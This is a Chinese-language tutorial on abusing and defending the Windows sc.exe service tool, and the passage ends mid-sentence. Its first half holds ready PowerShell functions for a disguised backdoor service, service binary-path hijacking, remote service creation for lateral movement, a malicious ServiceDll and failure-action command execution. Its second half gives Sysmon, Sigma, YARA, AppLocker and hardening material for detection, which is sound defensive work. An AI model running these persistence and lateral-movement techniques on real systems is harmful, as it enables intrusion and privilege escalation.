在 Windows 系統管理中,服務(Services)是系統核心功能的重要組成部分。
sc.exe(Service Control)是 Windows 內建的服務控制管理器命令列工具,提供了強大的服務管理功能。但這個合法的系統工具也經常被攻擊者濫用來進行持續性攻擊、權限提升和橫向移動。
今天我們來一起看看 sc.exe 的各種使用技術,以及如何檢測和防禦相關的惡意行為。
C:\Windows\System32\sc.exe
sc.exe 的正常管理功能包括:
sc query
sc query type= service
sc query state= all
sc queryex servicename
sc create MyService binPath= "C:\Path\To\Service.exe"
sc create MyService binPath= "C:\Path\To\Service.exe" start= auto
sc create MyService binPath= "cmd.exe /k C:\evil.exe" type= own type= interact
sc config MyService start= auto
sc config MyService binPath= "C:\NewPath\NewService.exe"
sc config MyService obj= ".\LocalSystem" password= ""
sc start MyService
sc stop MyService
sc pause MyService
sc continue MyService
sc delete MyService
攻擊者可以創建惡意服務來維持持續性存取。
function Create-BackdoorService {
param(
[string]$ServiceName = "WindowsUpdate",
[string]$BinaryPath = "C:\Windows\Temp\backdoor.exe",
[string]$DisplayName = "Windows Update Service"
)
$result = sc.exe create $ServiceName binPath= $BinaryPath DisplayName= $DisplayName start= auto
if ($LASTEXITCODE -eq 0) {
sc.exe description $ServiceName "Provides Windows Update functionality"
sc.exe start $ServiceName
return $true
}
return $false
}
服務名稱偽裝
自動啟動設定
start= auto
確保系統重啟後服務自動執行權限配置
透過修改現有服務的二進位路徑來執行惡意程式碼。
function Exploit-ServicePermission {
param(
[string]$TargetService,
[string]$PayloadPath
)
$originalPath = (sc.exe qc $TargetService | Select-String "BINARY_PATH_NAME").ToString().Split(":")[1].Trim()
sc.exe config $TargetService binPath= $PayloadPath
sc.exe stop $TargetService
Start-Sleep -Seconds 2
sc.exe start $TargetService
Start-Sleep -Seconds 5
sc.exe config $TargetService binPath= $originalPath
}
服務權限檢查
路徑劫持
時機控制
透過 sc.exe 在遠端系統創建和執行服務。
function Invoke-RemoteService {
param(
[string]$TargetHost,
[string]$ServiceName = "TempService",
[string]$Command
)
$remotePath = "\\$TargetHost\C$\Windows\Temp\payload.exe"
Copy-Item "C:\local\payload.exe" -Destination $remotePath -Force
sc.exe \\$TargetHost create $ServiceName binPath= "C:\Windows\Temp\payload.exe"
sc.exe \\$TargetHost start $ServiceName
Start-Sleep -Seconds 10
sc.exe \\$TargetHost stop $ServiceName
sc.exe \\$TargetHost delete $ServiceName
Remove-Item $remotePath -Force
}
遠端連接
\\computername
語法連接遠端系統檔案傳輸
清理作業
創建服務載入惡意 DLL。
#include <windows.h>
#include <stdio.h>
BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpReserved) {
switch (fdwReason) {
case DLL_PROCESS_ATTACH:
system("cmd.exe /c echo Hijacked > C:\\temp\\proof.txt");
break;
}
return TRUE;
}
extern "C" __declspec(dllexport) VOID ServiceMain(DWORD dwArgc, LPTSTR *lpszArgv) {
// Service main function
}
sc create MaliciousService binPath= "C:\Windows\System32\svchost.exe -k MyGroup"
reg add "HKLM\SYSTEM\CurrentControlSet\Services\MaliciousService\Parameters" /v ServiceDll /t REG_EXPAND_SZ /d "C:\evil.dll"
配置服務失敗時執行特定命令。
sc failure MyService reset= 0 actions= restart/0/restart/0/run/1000 command= "C:\Windows\System32\cmd.exe /c C:\evil.bat"
function Set-ServiceFailureAction {
param(
[string]$ServiceName,
[string]$Command
)
$actions = "restart/60000/restart/60000/run/60000"
sc.exe failure $ServiceName reset= 86400 actions= $actions command= $Command
sc.exe stop $ServiceName
}
需要監控的事件 ID:
Event ID | 描述 | 日誌 |
---|---|---|
7045 | 新服務已安裝 | System |
7040 | 服務啟動類型已變更 | System |
7036 | 服務已進入執行/停止狀態 | System |
4697 | 系統中已安裝服務 | Security |
<Sysmon schemaversion="4.22">
<EventFiltering>
<RuleGroup name="Service Creation Detection">
<ProcessCreate onmatch="include">
<Image condition="end with">sc.exe</Image>
<CommandLine condition="contains any">create;config;failure</CommandLine>
</ProcessCreate>
<RegistryEvent onmatch="include">
<TargetObject condition="contains">\Services\</TargetObject>
<EventType condition="is">SetValue</EventType>
</RegistryEvent>
</RuleGroup>
</EventFiltering>
</Sysmon>
function Monitor-ServiceChanges {
$baseline = Get-Service | Select-Object Name, DisplayName, Status, StartType
while ($true) {
Start-Sleep -Seconds 30
$current = Get-Service | Select-Object Name, DisplayName, Status, StartType
$diff = Compare-Object $baseline $current -Property Name, DisplayName, StartType
if ($diff) {
foreach ($change in $diff) {
if ($change.SideIndicator -eq "=>") {
Write-Warning "New or modified service detected: $($change.Name)"
$evt = Get-WinEvent -FilterHashtable @{LogName='System'; ID=7045} -MaxEvents 1
if ($evt) {
Write-Warning "Service details: $($evt.Message)"
}
}
}
$baseline = $current
}
}
}
title: Suspicious Service Creation via SC.exe
id: 85b794f7-8d8c-4cbd-a22e-5d3c9c4e3a6d
status: experimental
description: Detects suspicious service creation using sc.exe
references:
- https://lolbas-project.github.io/
tags:
- attack.persistence
- attack.t1543.003
- attack.privilege_escalation
logsource:
category: process_creation
product: windows
detection:
selection_img:
Image|endswith: '\sc.exe'
selection_cli:
CommandLine|contains|all:
- 'create'
- 'binPath'
suspicious_paths:
CommandLine|contains:
- '\Users\Public\'
- '\Temp\'
- '\AppData\'
- 'cmd.exe'
- 'powershell'
- 'regsvr32'
- 'rundll32'
condition: selection_img and selection_cli and suspicious_paths
falsepositives:
- Legitimate software installation
- System administration activities
level: medium
rule Suspicious_Service_Creation {
meta:
description = "Detects suspicious service creation patterns"
author = "Security Team"
date = "2024-11-15"
strings:
$sc1 = "sc create" nocase
$sc2 = "sc config" nocase
$sc3 = "binPath=" nocase
$susp1 = "cmd.exe /c" nocase
$susp2 = "powershell.exe" nocase
$susp3 = "%COMSPEC%" nocase
$susp4 = "regsvr32" nocase
$path1 = "\\Temp\\" nocase
$path2 = "\\Users\\Public\\" nocase
$path3 = "\\AppData\\" nocase
condition:
any of ($sc*) and any of ($susp*) and any of ($path*)
}
function Harden-ServicePermissions {
param([string]$ServiceName)
$sdl = "D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)"
sc.exe sdset $ServiceName $sdl
}
auditpol /set /subcategory:"Security System Extension" /success:enable /failure:enable
auditpol /set /subcategory:"System Integrity" /success:enable /failure:enable
<AppLockerPolicy Version="1">
<RuleCollection Type="Exe">
<FilePublisherRule Id="1" Name="Block Unsigned Services" Action="Deny">
<Conditions>
<FilePublisherCondition PublisherName="*" BinaryName="*" />
</Conditions>
<Exceptions>
<FilePublisherCondition PublisherName="O=MICROSOFT CORPORATION" />
</Exceptions>
</FilePublisherRule>
</RuleCollection>
</AppLockerPolicy>
function Create-ServiceBaseline {
$baseline = @()
Get-Service | ForEach-Object {
$service = $_
$wmi = Get-WmiObject Win32_Service -Filter "Name='$($service.Name)'"
$baseline += [PSCustomObject]@{
Name = $service.Name
DisplayName = $service.DisplayName
Status = $service.Status
StartType = $service.StartType
PathName = $wmi.PathName
StartName = $wmi.StartName
Description = $wmi.Description
Hash = (Get-FileHash $wmi.PathName -ErrorAction SilentlyContinue).Hash
}
}
$baseline | Export-Csv -Path "C:\ServiceBaseline.csv" -NoTypeInformation
}
sc.exe 作為 Windows 內建的服務管理工具,提供了強大的功能,但也成為攻擊者常用的工具。主要威脅包括: